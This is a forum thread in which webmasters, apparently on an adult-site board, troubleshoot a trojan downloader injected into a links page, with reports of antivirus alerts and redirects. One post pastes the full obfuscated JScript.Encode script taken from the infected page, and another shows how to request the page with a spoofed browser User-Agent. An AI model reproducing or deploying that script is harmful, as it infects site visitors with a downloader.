I was able to download it, but it downloaded as a 0 (zero) byte file.

I have about 20 of them in my temp files directory. They are 9kb in size.

I copied it to an old machine and ran it just for fun.

All it did was open a URL in my browser to download the same file. (same URL at rockys).

Nothing new is running in system processes. I'm running a full scan with norton, and I'll also run one with AVG and AdAware just to check.

I'm not at all sure what it's supposed to be doing.

According to Symantec, the class "trojan horse" is just a generic label when they don't really know what it is. The classification is based on behavior, not contents.

It seems pretty harmless, so far. Just a pain in the butt.

Still fucking sucks..surfers freak out and close the page instantly regardless if it is harmless..:(

is anyone else getting a redirection on this gallery?
http://www.darkestelf.com/dp19t.htm

Usually programs like this can remember IP.
Just checked from UNIX (new IP), code is still there.

fusionx, second time from the same URL they upload to your comp another program. Read about trojans somewhere else, they are not harmless.

Shemp, it is traffic-shop hosting, they redirect a few percents of traffic

Seems cool with I.E. no redirects

I just got a popup from norton with the trojan....Shit is still on there..

And I have paid versions of a few nice spyware scanners and I scanned earlier today along with norton so I have noting on my machine...Well now I do.:mad:

Oh - I don't mean trojans in general, I mean this particular file isn't doing much except downloading itself - at least so far.

I checked my system registry and there's nothing new in the Run, RunOnce or RunAsService keys.

It is odd that I can't find anything on the web that describes a trojan or any hijack attempt that creates a file named this way (windowsupdatexxxxx.exe).

yup, thanks bro...looks like one preferred submitter gets gassed tonite...

it didn't redirect for me

guess I should have read more of the posts before replying to Shemp's post lol ;)

:(

Shemp, did you get me right?
That is host who redirects traffic.
You webmaster may be doesn't know about redirection, just recommend him to move site to another host.


fusionx, there are too many trojan.downloader versions, but as far as I could remember, second file (even if it is downloaded from the same URL) is another file, second file opens a few ports on your comp and it is ready to download and run ANY PROGRAM.
Downloaded programs do the rest.

Tommy from Tommy's Bookmarks was recently having a similar problem.

Nothing seemed to show up for him but a lot of other people were seeing it.

I'm not sure what he did to get rid of it.

i got you...
we don't allow free hosts for preferred submitters...
the webmaster must have complete control of the domains.
thats part of the agreement of getting a submit account with us..

Remove all the j/s cause they fuckers will exploit it

I'm running zonealarm on that box, and I just tightened it up. I'll check it for a while and see if anything is trying to get in or out.

fusionx, you have to let it download second program first, but it is dangerous.

Shemp, ok, understand, good rule.

so snakes server is hacked ?
or how the hell did that thing get there ?
man this is scary

My server hasn't been hacked. I don't get the code, I think it's a jscript exploit that take advantage of certain browsers. But I'm still looking into it.

I got a virus on my laptop, and I can't get rid of it! And now I can't not surf, and my wireless connection is totally inexisting (not even showing up on Network Connections screen).

This fucking sucks!!! And they are chasing spammers? WTF?

Sorry, Snake, but I see this code if I download your page without any browser, so it cannot be problem of certain browsers

GoLiaT,
or snakesworld was hacked,
or his hosting provider was hacked,
or (only in theory) he inserted this code himself.

What url are you downloading and what method
are you using (wget, or something else?). I'd like to see
if i can duplicate from here.

- Thanks,
jpoker

If it was hacked don't you think I would be able to see the code? I haven't seen it yet on any of my pages.
I did see it on Pornno.com though so I'm stil trying to figure out why I can see it on his page and not mine.

Any tech genius' want to throw in a couple cents?

This is the source I got at the bottom of the aforementioned 'links' page:

<SCRIPT LANGUAGE="JScript.Encode">#@~^5Q0AAAhahahaha@&@&@&-mD,wWai@&-lMP;w^WC[Ni@&-lMPW(%I@&7lMP8E.sp@&-lM~tbN[n q:LI@&\CD,OKYC^W(Li@&@&6;x1YrW P$C9ADKA/D`*@&`@&ik6`Ul-rTlOWM lawHCs+"xEtk^DKdK0O,q Y+MxOPA62VKDn.r#@&i7DYEMU~Fp@&ikW`ZUm\romOWMR^GK 3kn3 l8V[*@&7iDYEMx,qi@&P~P,P~~,k0vUl7komOGDcw^lO0G.s"xJqr x2 Eb@&PP~~,P~Pi.Y;Mx,Fi@&P,~P,P~Pb0cUm\kTCYKDR!dnDz oxORrU9+ar6cJt?(3,*RXE*'xO8~L[~ l7komYK.R!/nDzonUDRk [+Xr0vE\?&2,v Jbx{Oq#@&~P,P~~,Pd.nDE.x,qp@&7b0vNW1EsnxDR^WK3rnck x9n6}0`rhdka'+6E#@*R8#@&di.+DE.U,Fi@&N@&@&;w^GmNn9 '~lN~DKA/Dc#p@&@&@&b0`e;w^Wl9n[#@& @&d8E.s{J4YD2)JzAASRDG^0XdwK. wC^l1+R1Ws&l9z8l xn.kz O*!+z%y*T*Jbx[WAd`w[lDnJ3`\CDtR.C NG:vb3J~r#c/E(/D.`y~X#3J nX+Jp@&8@&@&0!U^YbW PrxrOaW2`*@& @&P~~,PP~~b0c"aGa#@&,P,PP,P,`@&,P~P,P~7aWw{Ak NWS ^DlD+KW2;a`bi@&7\mD~G~WNz~{P2Wa 9W^!:xYc4K[Xp@&@&@&,P~~,PP,2WaRNK^;:xDR8o/G^W.'r8VmmVEp@&dG$KNzRkOHVnc4KDND,xPr/GVbN~8^lm0~!a6Jp@&7W~W9X /Oz^+ wKdkDkGU{Jl8dKV;YEp@&7KAKNXc/DzVRs+6Yx~r!Jp@&dKAW9z /DX^+ YG2{PE!rI@&i\C.,Y+h2p@&7Yha'v@!f&.PkYHs+{J2WkkOrK x)MnVmYk7nIJ@*@!mP4DnW{Jv_r:-rPGU~VE.xEwCDUDR[Km!:+ YcL+D2s+s+UO~Xq9c-rk{6.C:-r# /Oz^+ \bdk(ksrDX'wE4k[NU'Jv,Jp@&dD+s2_{@&EW HG;k+r!O'ENW1;h+ YconY3s:nxD$X&NcwrmVrn YwJ* kYz^+c\kkk(rVbYz''J4r9N+ wJEP-@&6UHKEk+6\n.{B[W1;:xO T+Y3s:nxD$Hq[v-rmVb+ O-r# /DXsnc\kkr4bVkDzx-r\b/r4sn'JvP'@&W HG;k+fGA 'vwm.xOcNKmEs+ ORT+O2^+hn YAH(Nv-JbmWDm:-E# dDXs+c-kkk8r^kYzx'J-kkr(Vn'JpwlM+ ORaW2RktGAvF~8SFBF#p2CDxDR;wsGmNnN{qial.n YR9G;Vrm0c*iv@*P'@&q'@&@!9qjP~qG'wE1VkUY'JPUPeSA' 'J-kdr(kskDz)4k[[xi~2K/rYbG )C(/KVED+p~YKwlOy*I~^+0DlOy*i'E@*-@&@!b:LPUG1l^t~4KD[nM'F~dDXs+{wrhr9Y4'*Z!aai4+roDtxXZ!wXIP1EDkG.)4l NI-E~9XU/M^''JEQ(EDsQr-EP@*@!JNr7@*@!zl@*@!J[k7@*Ei@&@&@&~,PP,~P,WAK[zRbx +.CP\d'O+s2i@&P~~,PP~7)@&N@&@&W!x^DkKxP1VCxv#@& @&d;2^Wl9nN{Fi@&~~P,P,P~kWcaW2#@&~P,P~~,Pd2GaR4k9n v#I@&8@&@&k6`e;w^WCNNb@&P@&P,~P,PP,rUkDwKwc#I@&ih rx9GhcWU80W.n!xsWm[{msl i@&)@&@&@&0!x^YbWU~GWZ^rm0`#@&`@&P,P,P~P~[Km;:UYcmGG0k+xEs/rw{Xi~alDt'Ji,n6ak.+k'\G ~P2qPG+m,+T!lPy&l*1ll,~j:/iri@&7Skx[GSRd+DPb:nKED`BK4N m^k^3v#IvB&!Zbi@&8@&@&W;x1YbWUPd4Kh2Wac#@& @&~,PP~~,Pr0v;aVGmNN#@&P,~P,P~PiDnO!Dxp@&P,PP,~~P K4N'AkU[Kh +7nxDRd.12VnhxOi@&~,P~,P,Pk6`e2Wa#@&P,P~~,PPP@&P, PP,~~Pik kOwG2v#I@&,~P,P~~i8@&@&7aW2Rk4KhcSk NWSR-+ Y /1Dnn (~Srx9Whcn-+ Yc/^Dnn 5SFBq#p@&7[KmEhn Y oOAVns+ YAHq9cJb{WDm:nE*R/DzVRVWO'Sk NGh n7+UYcdmM+nUoOhrU9WARk^M+n S0Y NK^Es+UYc4G[HRm^r+ YSWO_9W1Eh+UOc4GNH /1DGs^S+WOp@&7NK^!:n Yco+D2^n:xOAHq[crk{6.ls+J* dYHVROW2xSkUNKAR\nUDR/^.+U5 Abx[Khc/mM+UKKwRNKm;hxYc8W9XR1sr+ Y:W2_[G1Eh+ OR(W[zc/m.G^VPWaI@&8@&@&@&6Ex1YbGx,?nYzVs37+xDd`*@& @&rW`aWaR[W^;s+UYc.+mNzjDlYnx{J^Ws2^+OJ,[[,YKOl^W8Le'[G1E:UYclV^ s+ oDtb@&`@&iYGYmsW(Lx[KmEhn Y l^scVn oDti@&d6GDvk~',!I~bP@!,[W1E:UORmV^Rs+ULDtIPbQ_* @&7,PPrWvNGm!hxOcl^V`b#cOlT1C:'xEzJPL'P9Wm!hnxDR mVs`rbck["{Em^knUDmlssr#@&di[Km;s+ YRmV^ck*RGxsW;d:W7n'ktWS2Gwp8@&8@&ddnDKr:GED`Ej YbssA\nxDdv#Ir~,c!Z#p@&8@&@&r0v";2^Wl9nN*@& @&7d+DKb:nW;OvJj+D)V^2-n Y/cbpJSPWTZ#I@&dSkx9WS /YPks+G;D`BSrx9Whc[n0mE^YjYCO!/xJ,EBB TTZ#i@&@&iNGm!hxOchMkY`E@!Nb\~PbNxr|0Dmh+,xlsnxk |0Mlh+~~UKeSAxJ7kdr(kVrOH)4k9[xIaWkkYbW ll(/GV!YnIDWw{Ti^+0DxTiSk9Y4)qI4+ro4O)8iG-D0sGS)4k9[xE@*@!b0Dm:~0Mlh+(W.[D'rqJ,xlsnxJ1Vb+UYW.m:nJ,rN{J^sb+xOWMlh+r~,/OHV'JaWkrYbWU)M+sCDk\IYKw' +X!pV0O'R*W!Ihb[Y4){TZitnrTtO)FTZiE@*@!Jk0Mlsn@*@!z[k7@*vbp@&d9Gm!:+ O hMkD+cB@!C,0GV9nD{Jd4VVldDl.Y!2rPOmDT+Y{J1skxO0M lhnrPk9xJ1VkUOmmV^J~/Oz^+xJ7r/b4rsbYXl4bN[+ I9kdaVmX) W ni(+4l7kG.=ED^ca9+0m;sY[b m4W./^k^3*IJ@*@!&C@*B#I@&iNGm!hxOcoY2^+snxDAzq9`E^^k+ OmmVVrb m^k13c#I@&iNGm!h+ Y AMkYncE@!r0MCs+~kD1'Jm4K;Y=4sl 3E~kYX^n'r\kkr8k^kDXltr[9+Ui9r/aVCz=xWUnpJ@*@!Jr6DCs+@*B#p@&)@&@&bVoEAAhahahaha^# ~@</script>

I just did a wget from one of my unix server to http://www.snakesworld.com/links.html
and i don't see any of this code.

- F

jpoker,

In any UNIX shell run command

telnet www.snakesworld.com 80

You will see something like this:

Trying 64.158.30.220...
Connected to 64.158.30.220.
Escape character is '^]'.

Then type something like this:

GET /links.html HTTP/1.0
Host: www.snakesworld.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Accept: */*
Connection: close

And press "Enter" twice

And you will see page source code.


Snake, no I do not think so.
Have you turned off cookies?
Which IP-addresses did you use to see your page?
From how many computers did you try to do it?

jpoker,
this system checks User-Agent, so wget will not work

i don't believe it - snake registered for GFY before I did!!!!!!!!!!!!!

hey snake - get into vegas a day early - 2:30pm jan 3 is the TGP VIP party this year

that doesnt mean he couldnt do it. besides... i dont think anyone doubted that his site was hacked.

i believe he did - i was just amazed by it as he doesn't post here much.

snake runs a clean site and has NEVER screwed his surfers around, EVER. he's a straight up honest awesome guy I stand behind 100%

comes up clean for me

look in your startup folder

Crap, I got the prompt too and I just spent 2 days reformatting this computer from the last shit I sucked in. Do I have another virus?

Snake, nortons goes off for me to on your page.

Wtf is this bullshit. I didnt put anything on my site, and of course I cant see it either. :mad:

Now to figure out how to get rid of this shit.


JJJ

spyware

This makes me wonder how many peoples sites are exploited, or machines for that matter.

I surf TGP's all the time looking for galleries and stuff and get popups and virus attempt, exploits and whatever all the time.

exactly

couldn't the hacker check the ftp logs, and see what ip snake logs in from, and make sure any ip from that block sees the normal page

I dont get this code on either site. They both come up clean for me.